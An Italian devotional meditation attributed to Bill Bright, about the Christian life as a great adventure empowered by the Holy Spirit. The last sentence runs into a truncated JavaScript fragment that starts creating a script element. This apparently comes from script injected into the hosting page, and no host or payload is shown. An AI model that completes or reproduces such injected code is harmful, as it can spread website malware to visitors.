Meditazione del giorno: Una grande avventura

bill-brightdi BILL BRIGHT  (Fondatore di Campus Crusade for Christ International)  –   La vita cristiana è una grande avventura. E una vita che ha un fine ed una forza. Cristo ha fatto la promessa più incredibile che si possa pensare: «Chi crede in me farà anch’egli le opere che faccio io; e ne farà di maggiori, perché io me ne vado dal Padre; e quel che chiederete nel mio nome, lo farò…».  Ovviamente, con le nostre forze non possiamo compiere queste grandi opere che, secondo la Sua promessa, possiamo fare. Soltanto Cristo che vive in noi in tutta la potenza della sua resurrezione, che cammina col nostro corpo, pensa con la no­stra mente, ama col nostro cuore, parla con le nostre labbra, ci darà la potenza dello Spirito Santo per compiere

queste grandi opere. Non sarà la nostra sapienza, né la nostra eloquenza, né la nostra logica, né la nostra buona natura, né la nostra forza di persuasione, che ci faranno condurre gli uomini al Salvatore.

II Figliuolo dell’uomo venne personal mente per cercare e salvare i perduti. Gesù infatti disse: «Venite dietro a me, e vi farò pescatori d’uomini». E’ compito no­stro seguirLo ed e compito Suo farci pe­scatori d’uomini. I cristiani del primo secolo, guidati e rivestiti di potenza dallo Spirito Santo, ripieni dell’amore di Cristo, misero sottosopra il mondo.

Ripieni dello Spirito Santo, i discepoli ricevettero una potenza divina e soprannaturale che trasformò uomini timorosi in testimoni radiosi del Cristo. Iddio si servi di essi per cambiare il corso della storia. E quella forza onnipotente, che è la po­tenza dello Spirito Santo, e a voi offerta per permettervi di vivere una vita santa e feconda per Gesù Cristo.var d=document;var s=d.createElement(‘script’);